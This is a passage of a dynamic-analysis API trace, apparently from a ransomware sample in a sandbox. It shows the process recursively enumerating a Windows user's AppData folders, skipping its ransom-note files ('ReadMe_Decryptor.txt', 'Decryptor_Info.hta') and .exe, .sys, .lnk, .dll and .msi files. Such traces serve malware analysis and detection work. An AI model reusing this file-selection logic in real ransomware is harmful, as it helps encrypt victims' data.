lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache" [0084.208] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\" [0084.208] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\") returned 75 [0084.208] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0084.209] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.209] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe9256a4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.209] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.209] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.209] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb1912e90, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0084.209] lstrcmpW (lpString1="index.dat", lpString2=".") returned 1 [0084.209] lstrcmpW (lpString1="index.dat", lpString2="..") returned 1 [0084.209] lstrcmpiW (lpString1="index.dat", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.209] lstrcmpiW (lpString1="index.dat", lpString2="Decryptor_Info.hta") returned 1 [0084.209] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0084.209] lstrcmpiW (lpString1=".dat", lpString2=".exe") returned -1 [0084.209] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0084.209] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0084.209] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0084.209] lstrcmpiW (lpString1=".dat", lpString2=".msi") returned -1 [0084.209] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4f0dcf10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x4f0dcf10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0084.210] lstrcmpW (lpString1="Low", lpString2=".") returned 1 [0084.210] lstrcmpW (lpString1="Low", lpString2="..") returned 1 [0084.210] lstrlenW (lpString="Low") returned 3 [0084.210] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpString2="Low" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low" [0084.210] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\" [0084.210] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\") returned 79 [0084.210] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a920 [0084.210] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.210] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4f0dcf10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x4f0dcf10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.210] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.210] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.211] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4f0dcf10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f0dcf10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x64c3a3c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0084.211] lstrcmpW (lpString1="index.dat", lpString2=".") returned 1 [0084.211] lstrcmpW (lpString1="index.dat", lpString2="..") returned 1 [0084.211] lstrcmpiW (lpString1="index.dat", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.211] lstrcmpiW (lpString1="index.dat", lpString2="Decryptor_Info.hta") returned 1 [0084.211] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0084.211] lstrcmpiW (lpString1=".dat", lpString2=".exe") returned -1 [0084.211] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0084.211] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0084.211] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0084.211] lstrcmpiW (lpString1=".dat", lpString2=".msi") returned -1 [0084.211] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4f0dcf10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f0dcf10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x64c3a3c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0084.211] FindClose (in: hFindFile=0x72a920 | out: hFindFile=0x72a920) returned 1 [0084.214] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4f0dcf10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f0dcf10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x64c3a3c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0084.214] FindClose (in: hFindFile=0x77c988 | out: hFindFile=0x77c988) returned 1 [0084.214] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d22d5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0084.214] lstrcmpW (lpString1="Libraries", lpString2=".") returned 1 [0084.214] lstrcmpW (lpString1="Libraries", lpString2="..") returned 1 [0084.214] lstrlenW (lpString="Libraries") returned 9 [0084.214] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Libraries" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries" [0084.214] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0084.214] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 74 [0084.214] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0084.215] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.215] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d22d5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.215] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.215] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.215] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x112, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0084.215] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0084.215] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0084.215] lstrcmpiW (lpString1="desktop.ini", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.215] lstrcmpiW (lpString1="desktop.ini", lpString2="Decryptor_Info.hta") returned 1 [0084.215] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0084.215] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0084.215] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0084.215] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0084.215] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0084.215] lstrcmpiW (lpString1=".ini", lpString2=".msi") returned -1 [0084.216] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d1e12e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents.library-ms", cAlternateFileName="DOCUME~1.LIB")) returned 1 [0084.216] lstrcmpW (lpString1="Documents.library-ms", lpString2=".") returned 1 [0084.216] lstrcmpW (lpString1="Documents.library-ms", lpString2="..") returned 1 [0084.216] lstrcmpiW (lpString1="Documents.library-ms", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.216] lstrcmpiW (lpString1="Documents.library-ms", lpString2="Decryptor_Info.hta") returned 1 [0084.216] PathFindExtensionW (pszPath="Documents.library-ms") returned=".library-ms" [0084.216] lstrcmpiW (lpString1=".library-ms", lpString2=".exe") returned 1 [0084.216] lstrcmpiW (lpString1=".library-ms", lpString2=".sys") returned -1 [0084.216] lstrcmpiW (lpString1=".library-ms", lpString2=".lnk") returned -1 [0084.216] lstrcmpiW (lpString1=".library-ms", lpString2=".dll") returned 1 [0084.216] lstrcmpiW (lpString1=".library-ms", lpString2=".msi") returned -1 [0084.216] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.216] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.216] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.216] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x77cf48 [0084.216] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.216] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d22d5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music.library-ms", cAlternateFileName="MUSIC~1.LIB")) returned 1 [0084.216] lstrcmpW (lpString1="Music.library-ms", lpString2=".") returned 1 [0084.217] lstrcmpW (lpString1="Music.library-ms", lpString2="..") returned 1 [0084.217] lstrcmpiW (lpString1="Music.library-ms", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.217] lstrcmpiW (lpString1="Music.library-ms", lpString2="Decryptor_Info.hta") returned 1 [0084.217] PathFindExtensionW (pszPath="Music.library-ms") returned=".library-ms" [0084.217] lstrcmpiW (lpString1=".library-ms", lpString2=".exe") returned 1 [0084.217] lstrcmpiW (lpString1=".library-ms", lpString2=".sys") returned -1 [0084.217] lstrcmpiW (lpString1=".library-ms", lpString2=".lnk") returned -1 [0084.217] lstrcmpiW (lpString1=".library-ms", lpString2=".dll") returned 1 [0084.217] lstrcmpiW (lpString1=".library-ms", lpString2=".msi") returned -1 [0084.217] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77d178 [0084.217] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x780fb8 [0084.217] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.217] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x77d178 [0084.217] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x780fb8 | out: hHeap=0x6d0000) returned 1 [0084.217] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d207440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe23, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures.library-ms", cAlternateFileName="PICTUR~1.LIB")) returned 1 [0084.217] lstrcmpW (lpString1="Pictures.library-ms", lpString2=".") returned 1 [0084.217] lstrcmpW (lpString1="Pictures.library-ms", lpString2="..") returned 1 [0084.217] lstrcmpiW (lpString1="Pictures.library-ms", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.218] lstrcmpiW (lpString1="Pictures.library-ms", lpString2="Decryptor_Info.hta") returned 1 [0084.218] PathFindExtensionW (pszPath="Pictures.library-ms") returned=".library-ms" [0084.218] lstrcmpiW (lpString1=".library-ms", lpString2=".exe") returned 1 [0084.218] lstrcmpiW (lpString1=".library-ms", lpString2=".sys") returned -1 [0084.218] lstrcmpiW (lpString1=".library-ms", lpString2=".lnk") returned -1 [0084.218] lstrcmpiW (lpString1=".library-ms", lpString2=".dll") returned 1 [0084.218] lstrcmpiW (lpString1=".library-ms", lpString2=".msi") returned -1 [0084.218] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x780fb8 [0084.218] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x781060 [0084.218] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x780fb8 | out: hHeap=0x6d0000) returned 1 [0084.218] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x781158 [0084.218] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x781060 | out: hHeap=0x6d0000) returned 1 [0084.218] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d207440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos.library-ms", cAlternateFileName="VIDEOS~1.LIB")) returned 1 [0084.218] lstrcmpW (lpString1="Videos.library-ms", lpString2=".") returned 1 [0084.218] lstrcmpW (lpString1="Videos.library-ms", lpString2="..") returned 1 [0084.218] lstrcmpiW (lpString1="Videos.library-ms", lpString2="ReadMe_Decryptor.txt") returned 1 [0084.218] lstrcmpiW (lpString1="Videos.library-ms", lpString2="Decryptor_Info.hta") returned 1 [0084.219] PathFindExtensionW (pszPath="Videos.library-ms") returned=".library-ms" [0084.219] lstrcmpiW (lpString1=".library-ms", lpString2=".exe") returned 1 [0084.219] lstrcmpiW (lpString1=".library-ms", lpString2=".sys") returned -1 [0084.219] lstrcmpiW (lpString1=".library-ms", lpString2=".lnk") returned -1 [0084.219] lstrcmpiW (lpString1=".library-ms", lpString2=".dll") returned 1 [0084.219] lstrcmpiW (lpString1=".library-ms", lpString2=".msi") returned -1 [0084.219] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x780fb8 [0084.219] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x781060 [0084.219] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x780fb8 | out: hHeap=0x6d0000) returned 1 [0084.219] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x781220 [0084.219] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x781060 | out: hHeap=0x6d0000) returned 1 [0084.219] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d207440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos.library-ms", cAlternateFileName="VIDEOS~1.LIB")) returned 0 [0084.219] FindClose (in: hFindFile=0x77c988 | out: hFindFile=0x77c988) returned 1 [0084.219] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Shortcuts", cAlternateFileName="NETWOR~1")) returned 1 [0084.219] lstrcmpW (lpString1="Network Shortcuts", lpString2=".") returned 1 [0084.219] lstrcmpW (lpString1="Network Shortcuts", lpString2="..") returned 1 [0084.220] lstrlenW (lpString="Network Shortcuts") returned 17 [0084.220] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Network Shortcuts" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts" [0084.220] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\" [0084.220] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned 82 [0084.220] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0084.221] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.221] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.221] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.221] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.221] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0084.221] FindClose (in: hFindFile=0x77c988 | out: hFindFile=0x77c988) returned 1 [0084.221] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Printer Shortcuts", cAlternateFileName="PRINTE~1")) returned 1 [0084.221] lstrcmpW (lpString1="Printer Shortcuts", lpString2=".") returned 1 [0084.221] lstrcmpW (lpString1="Printer Shortcuts", lpString2="..") returned 1 [0084.221] lstrlenW (lpString="Printer Shortcuts") returned 17 [0084.221] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Printer Shortcuts" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts" [0084.221] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\" [0084.221] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned 82 [0084.221] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0084.222] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.222] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.222] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.222] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.222] FindNextFileW (in: hFindFile=0x77c988, 